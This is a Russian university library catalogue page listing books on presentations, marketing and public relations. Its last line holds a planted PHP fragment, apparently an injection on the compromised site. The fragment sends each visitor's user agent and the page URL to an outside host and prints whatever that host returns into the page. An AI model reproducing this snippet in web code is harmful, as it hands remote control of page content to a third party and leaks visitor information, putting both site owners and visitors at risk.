Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

2 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПРЕЗЕНТАЦИЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 332
1. 
Абчук, Владимир Авраамович. Азбука маркетинга [Текст] / В. А.Абчук, 1998. - 270 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
2. 
Ботавина, Римма Николаевна. Этика деловых отношений [Текст] : Учеб. пособие по экономическим специальностям / Р. Н.Ботавина, 2001. - 203, [3] с.

Содержание книги дает представление о современных нормах и стандартах этики делового поведения, общения, договорной дисциплины. Рассматриваются этическая сторона презентаций, деловых приемов, требования к внешнему виду и манерам делового человека. Книга может служить своеобразным справочником по профессиональной этике в сфере деловой жизни.

3. 
Чумиков, Александр Николаевич. Связи с общественностью [Текст] : Учеб. пособие для управленч. специальностей вузов / А. Н. Чумиков, 2001. - 295 с.
Держатели документа (Информация об экземплярах) 
4. 
Бландел, Ричард. Эффективные бизнес-коммуникации. Теория и практика в эпоху информации [Текст] / Р. Бландел; А. С. Токарев, 2000. - 381 с.
5. 
Глотов, Виктор Андреевич. Организация обслуживания на предприятиях торговли [Текст] : Учеб. пособие / В. А.Глотов, 2002. - 60 с.
Ключевые слова 
ПОКУПАТЕЛЬ -- МАГАЗИН -- ПРОДАЖА -- РОЗНИЧНАЯ -- ТОРГОВЛЯ -- ПРЕЗЕНТАЦИЯ -- САМООБСЛУЖИВАНИЕ -- ОБРАЗЕЦ -- ИНДИВИДУАЛЬНОЕ -- ОБСЛУЖИВАНИЕ -- УСЛУГА -- РЕКЛАМА -- СВЕТОВАЯ -- ПЕЧАТНАЯ -- ДЕМОНСТРАЦИОННАЯ -- ВИТРИННАЯ -- КАТАЛОГ -- ПРОСПЕКТ -- БУКЛЕТ -- ПЛАКАТ -- ЛИСТОВКА -- КАРМАННЫЙ -- КАЛЕНДАРЬ -- СУВЕНИРНАЯ -- ПОДАРОЧНОЕ -- ИЗДЕЛИЕ -- ФИРМЕННЫЙ -- УПАКОВОЧНЫЙ МАТЕРИАЛ -- ПЕРСОНАЛ -- УПРАВЛЕНИЕ -- КАДРЫ -- РЕЖИМ РАБОТЫ -- НЕДОСТАЧА -- МАТЕРИАЛЬНАЯ -- ОТВЕТСТВЕННОСТЬ -- ОПТОВАЯ -- ПОСРЕДНИК -- СКЛАД -- ТАРА
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
6. 
Мокшанцев, Рудольф Иванович. Психология рекламы [Текст] : Учеб. пособие для вузов по специальности "Менеджмент" / Р. И. Мокшанцев, 2002. - 228 [1] с.
Держатели документа (Информация об экземплярах) 
7. 
Казанцев, Анатолий Константинович. Основы производственного менеджмента [Текст] : Учеб. пособие для группы экономики и образования и для системы доп. образования / А. К. Казанцев, Л. С. Серова, 2002. - 347 с.

Учебное пособие отражает актуальную информацию и содержит описание новейших представлений о производственном менеджменте на основе отечественной и зарубежной теории и практики.

В богато иллюстрированной форме излагаются теоретические аспекты современного производственного менеджмента. Приводится материал для практических упражнений, тестирования знаний обучающихся и ситуационного анализа в форме деловых компьютерных игр.

8. 
Зарецкая, Елена Наумовна. Деловое общение [Текст] : Учеб.: В 2 т. Т. 2, 2002. - 719 с.
Держатели документа (Информация об экземплярах) 

Двухтомник является первым отечественным учебником по деловому общению - новой учебной дисциплины, ставшей обязательной для подготовки в вузах специалистов многих профилей.

Двухтомник создан на основе авторского курса (читаемого в АНХ при Правительстве РФ и МГУ им. М. В. Ломоносова), в котором использованы классические подходы и новейшие достижения в коммуникативной сфере.

Изложение принципов делового общения базируется на объединении научной и практической проблематики таких дисциплин, как риторика, логика, психология, социология, философия, этика, кибернетика, менеджмент, теория информации, семиотика, поэтика, нейрофизиология, которые в совокупности могут названы "наукой о человеке".

Деловое общение пинимаеися автором предельно широко - как любая профессиональная речевая деятельность, поэтому издание рассчитано на широкий круг настоящих и будущих специалистов в сферах управления, педагогики, юриспруденции, богословия, политики, дипломатии, журналистики, рекламного дела и паблик рилейшнз.

9. 
Стимсон, Нэнси. Подготовка и представление тренинговых материалов [Текст] / Н. Стимсон; Пер. с англ. Н. Сафроновой, 2002. - 160 с.
Держатели документа (Информация об экземплярах) 
10. 
Абчук, Владимир Авраамович. Коммерция [Текст] : Учеб. / В. А. Абчук, 2000. - 474 с.
Ключевые слова 
Коммерция -- Коммерческая деятельность -- Учебник и пособие -- Бизнес -- Предпринимательская деятельность -- Предпринимательство -- Торговля -- Менеджмент -- Прибыль -- Финансирование -- Кредитование -- Убыток -- Коммерческое предприятие -- Планирование -- Анализ предприятия -- Товародвижение -- Товар -- Купля-продажа -- Продажа -- Обязательство -- Договорное обязательство -- Связь с общественностью -- Паблик рилейшнз -- Презентация -- Реклама -- Риск -- Коммерческий риск -- Коммерческая прибыль -- Международная коммерция -- Коммерческий расчет
11. 
Фридман, Сьюзан. Как показать товар лицом: выставки и презентации [Текст] : Учеб. пособие / С. Фридман, 1994. - 110 с.
Держатели документа (Информация об экземплярах) 
12. 
Саркисян О. А. Конспект рекламиста [Текст] / О. А. Саркисян, О. А. Груздева, Г. В. Красовский, 1999. - 133 с.
Держатели документа (Информация об экземплярах) 
13. 
Comfort, Jeremy. Effective presentations [Текст] / J. Comfort, 1995. - 79 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
14. 
Хисрик, Роберт. Торговля и менеджмент продаж [Текст] / Д. Хисрик, В. Джексон; И. Н. Ганичев, 1996. - 365 с.
15. 
Мокшанцев, Рудольф Иванович. Психология рекламы [Текст] : Учеб. пособие для вузов по специальности "Менеджмент" / Р. И. Мокшанцев, 2000. - 229 с.
Держатели документа (Информация об экземплярах) 
16. 
Романычева, Эльза Тимофеевна. Дизайн и реклама. Компьютерные технологии [Текст] : Справ. и практ. рук. / Э. Т. Романычева, О. Г. Яцюк, 2000. - 428 с.
Держатели документа (Информация об экземплярах) 
17. 
Барышева, Ася Владимировна. Как продать слона, или 51 прием заключения сделки [Текст] / А. В. Барышева, 2000. - 159 с.
Держатели документа (Информация об экземплярах) 
18. 
Хэйвуд, Роджер. Все о Public Relations [Текст] : Как добиться успеха в бизнесе, используя связи с общественностью: Пер. с англ. / Р. Хэйвуд, Р. Хейвуд, 1999. - 255 с.
Держатели документа (Информация об экземплярах) 
19. 
Гермогенова Л. Ю. Эффективная реклама в России. Практика и рекомендации [Текст] / Л. Ю. Гермогенова, 1994. - 252 с.
Держатели документа (Информация об экземплярах) 
20. 
Алешина, Ирина Викторовна. Паблик Рилейшнз для менеджеров и маркетеров [Текст] / И. В. Алешина, 1997. - 255 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2964 - 22.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.14 с.12 запросов, 0.50c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;